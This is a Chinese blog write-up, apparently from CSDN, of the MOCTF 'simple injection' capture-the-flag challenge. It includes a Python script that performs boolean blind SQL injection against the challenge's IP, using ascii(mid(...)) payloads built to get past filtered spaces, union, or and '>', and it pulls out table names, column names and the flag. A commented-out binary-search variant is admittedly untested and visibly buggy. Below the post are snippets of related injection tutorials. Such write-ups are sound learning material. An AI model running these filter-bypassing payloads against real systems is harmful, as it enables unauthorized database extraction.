MOCTF 简单注入

最新推荐文章于 2022-01-25 16:42:00 发布
最新推荐文章于 2022-01-25 16:42:00 发布
阅读量627 收藏 1
点赞数
分类专栏: CTF题 MOCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/90940178
版权
CTF题 同时被 2 个专栏收录
115 篇文章 19 订阅
订阅专栏
MOCTF
5 篇文章 0 订阅
订阅专栏

MOCTF 简单注入

简单注入,可真的是太“简单”了
打开页面,查看源码:
在这里插入图片描述
传入id=1,依次输入id=1,id=2,id=3有一些提示,说数据库的长度大于20,而且flag就在这个库内
开始检测注入,,,,,
经过一系列的检查之后发现:
/**/,空格,substr(),union,or,>(后面写脚本的时候才知道>过滤了,套~)等…都被过滤了
union都被过滤了,报错注入实现不了,但是ascii函数和mid函数和hex函数没有被过滤
mid函数和substr差不多,盲注跑脚本!!!
说实话,这个脚本真的写得头皮发麻,一路的坎坷!!!
先附上脚本:

import requests
import io
import sys

'''
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')		#改变标准输出的默认编码,否则s.text不能输出
url = "http://119.23.73.3:5004/?id=1'and(length(database()))!='20"
s = requests.get(url)
s.encoding = 'utf-8' 

content = s.content

#检验是否成功
if 'Hello' in s.text:
	s.encoding = 'gbk' 
	print(s.text)

#构造sql注入语句
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20

'''
#-----------------------------二分法不能用,>被过滤了,套他的猴子!!!!----------------------------------
#-----------------------------所以这个二分脚本写得有没有错还不清楚。。。。。----------------------------------
'''
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))>%s)and(length(database()))!='20"
ss = ""
for i in range(1,30):
	maxx = 126
	minx = 32
	flag = 0
	while abs(maxx-minx)>1:
		mid = (maxx + minx)/2
		payload = url%(str(i),str(mid))
		s = requests.get(payload)
		if 'Hello' in s.text:
			flag = 1
			min = mid
		else:
			max = mid

		if(flag):
			ss += chr(mid)
		else:
			break
	print(ss)
'''
#-----------------------------跑得太慢了,受不了-------------------------------
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)and(length(database()))!='20"
url2 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s)and(length(database()))!='20"
url3 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s)and(length(database()))!='20"
ss = ""
for i in range(1,50):
	for j in range(32,126):
		payload = url3%(str(i),str(j))
		#print(payload)
		s = requests.get(payload)
		if 'Hello' in s.text:
			ss += chr(j)
			print(ss)
			break

url是跑表名的,url2是跑列名的,url3直接爆flag的,,,,,,截图如下:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
第一次编写脚本跑web,花的时间还不是一般的多,以后继续学习,继续努力!!!

A_dmins
关注
专栏目录
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF bluebear @ MOCTF RB916120 @ MOCTF molamola @ MOCTF Allon @ MOCTF T4rn @ MOCTF P0tato @ 20级茯苓@ 20级wyjbot @ 20级Mark0519 @ 20级...
sql简单注入
weixin_51646864的博客
06-13 691
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门
weixin_55634477的博客
03-14 971
超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在知识盒子 知识盒子 老套的题目:提取网站数据库中存储的数据(flag) 打开网页 首先嘛,实验一下网站的功能 简单查询功能 正常操作一下 输入相应提示1 得到正确的反馈信息 错误操作一下 错误的反馈信息 右键查看网页源代码,看有么有可用信息 这里,可以得到最有可能查询的字段名称 让我们试试推理一下网站最有可能的SQL语句 条件查询语句 select 相应字段不清楚 from 表不清楚 where
【Spring】注入详解(原理、set注入、JDK内置类注入、自定义类注入、构造方法注入
See_Star的博客
09-07 1307
注入: Spring通过配置文件,为成员变量赋值; Set注入:Spring调用Set方法通过配置文件为成员变量赋值; 构造注入:Spring调用构造方法通过配置文件为成员变量赋值; 文章目录一、注入(Injection)二、简单注入实现三、Set注入3.1 JDK内置类型3.2 用户自定义类型3.3 Set注入的简化3.3.1 基于属性的简化3.3.2 基于p命名空间的简化四、构造注入4.1 有参构造注入4.2 构造方法重载五、总结 一、注入(Injection) 什么是注入? 通过 Sprin.
使用篇二,简单注入
qq_37221502的博客
07-08 305
准备工作 1、我们要开始写例子了 2、为了例子的规范与简洁 3、我们写一个基类,后面继承即可 public abstract class Test : DisposableObject { public Test() { Framework.BindEnvUpdate(Update, EnvironmentType.Ev0); Framework.BindEnvDispose(Dispose, Environ
SQL简单注入步骤
m0_62092622的博客
01-25 2354
以sql-labs第一关为例 检查网站能否注入 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' //记得单引号要在英文输入法下 输入单引号之前不报错,输入单引号后报错,即可说明网站存在注入 查询表列数 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' order by 1 --+ http://localhost:6
简单记录一下MOCTF的三道web题
0verWatch的博客
03-06 3699
本人渣渣,于是记录一下 死亡退出 一道代码审计题目 <?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
MOCTF-WRITE-UP(一)
郁离歌丶的博客
01-31 3660
萌新第一次写wp,今天发现了moctf这个平台,顺手点进去做了几个简单的萌新题目。已是深夜,先写一点点。写的不好见谅。WEB签到question:欢迎加入MOCTF官方交流群:620047348answer:加群得flag。一道水题question:呱呱呱?answer:二话不说f12审查元素发现flag还是水题question:膜CTF?answer:二话不说f12审查元素again可以发现两...
Moctf---简单注入
03-21 124
因为比较菜诶,所以这道题的命令让我拼接了好久。记录在此 放出url =http://119.23.73.3:5004/ 打开后我们在后面写?id=1既--> 当我们输入的信息有误后,页面就没有回显了。 所以我们得到,当命令正确之后,会有hello的回显。 我们在尝试一下,发现他给ban了空格、sub、>等等。但是我们发现其他一些基础的命令没有给ban,比如...
MOCTF-Web-我想要钱
1stPeak's Blog
09-23 236
1、题目: 2、传送门:http://119.23.73.3:5001/web6/ 3、代码释义: <?php include "flag.php"; highlight_file(__FILE__); if (isset($_GET['money'])) { $money=$_GET['money']; if(strlen($...
MOCTF web writeup
weixin_34150503的博客
06-21 177
前几天发现一个不错的平台MOCTF但一直没时间刷。这几天陆续更新web题的wp web1:一道水题 进去一堆青蛙 查看源代码,看到flag web2:还是水题 发现密码框输入不了,遂F12审查元素,删除disable属性,以及将长度改为5,输入moctf。得到flag web3:访问限制 题目提示用NAIVE浏览器,于是想到burp改use...
Writeup of MOCTF
MozhuCY的博客
02-01 1623
RE: 0x00:SOEASY逆向的签到题,扔进IDA搜索字符串,本来想定位下主函数,结果直接看到了flag。  0x01:跳跳跳打开dump.exe发现居然是掷色子的游戏..很明显爆破,OD载入找到关键跳,直接吧jnz改成je...或者从开头直接跳到最后hhhhhhhhh,得到一串base64,解之得到flag。  0x02:听小姐姐的话此题官方并没放出..  0x03:暗恋的苦恼得到一个jia...
简单sql注入(手注)
09-05 428
一、Sql简单手注的一般思路: 1、 先看是不是注入点(字符型、整型) 2、 判断字段数 3、 判断是否可以用union联合查询(是否有显示位) 4、 获取所有数据库名 5、 获取数据库中表名 6、 获取表中的字段名 7、 获取字段中的信息数据 1、 先看是不是注入点 *加单引号 (‘)如果报错则可能存在 输入?2-1页面变化(数值型) *数字型:and 1...
决斗场 - 实验吧 WEB 简单的sql注入
RaAlGhul的博客
11-14 2125
题目链接:http://www.shiyanbar.com/ctf/1875 题目提示:通过注入获得flag值。 点开题目,又是一个简洁的界面让我一脸懵逼(0.0) 好吧,开始我们的注入之旅。 首先,随便往框里面输入字符和数字,发现当输入1、2、3的时候有查询结果。 接下来进行注入的第一步测试,输入一个带单引号的数据,目的是测试是否对构造SQL的字符串进行了过滤。当把带有
本地搭建简单SQL注入环境
热门推荐
endeav_or的博客
08-10 1万+
首先本地要有一个wamp server,因为SQL注入涉及到与数据库交互,所以先从搭建测试数据库开始。       打开mysql console,输入root账户密码登陆。创建一个数据库,并命名为fake,命令如下:create database fake;      因为我之前已经建立好了,这里直接配置fake数据库的用户权限,配置为leon用户访问,且leon用户的密码为leon,命令如下:
MOCTF
weixin_30825199的博客
05-03 661
花了几个小时做了一下moctf,整理了几个当时没做出来的题 unset <?php highlight_file('index.php'); function waf($a){ foreach($a as $key => $value){ if(preg_match('/flag/i',$key)){ exit('are yo...
MOCTF crypto 密码学 writeup
qq_41358038的博客
03-14 819
MOCTF crypto 密码学(持续更新)1.数据库密码2.rot 大法好3.奇怪汉字4.就是这个feel 1.数据库密码 D8EA7326E6EC5916ACCD6E0C9D264C63 涉及到数据库,猜到是md5,但没想到是要把0-9,A-F 之外的字母删掉再md5解密。 还是对md5了解不够 MD5编码: 要么全为大写,要么全为小写 字符数量16/32 MD5的取值范围是0~9 a~f ...
MOCTF writeup web篇(持续更新)
ReganYue's Blog
05-09 1638
web1:一道水题 查看源码。get flag。 web2:还是水题 审查元素,删除disable,将长度改为5,输入moctf。get flag 。 web3:访问限制 burpsuite改user-agent:NAIVE Accept-Language: zh-HK。get flag。 web4:机器蛇 贪吃蛇好不好玩? 题目机器蛇让我想到robots.txt robots.txt里面有fl...
[BJDCTF 2nd]简单注入
夜幕下的灯火阑珊的博客
05-14 1026
访问robots.txt得到提示:hint.txt,访问hint.txt select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 如果传入username=admin\password=123456#就会变成 select * from u...
MOCTF(第16题)
没有任何buff的小菜鸡的博客
08-17 200
为了接着之前的博客,还是觉得要在这里写完,因为后面的博客我都放到自己的github博客上去啦~ 第16题:PUBG 开局一张图 这个是点击学校的按键后得到的 (其他都是diedie的) 然后就可以看到源码泄露的情况 接着将index.php.bak点击后,下载 接着可以审计源码 <?php error_reporting(0); include 'class.php'; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值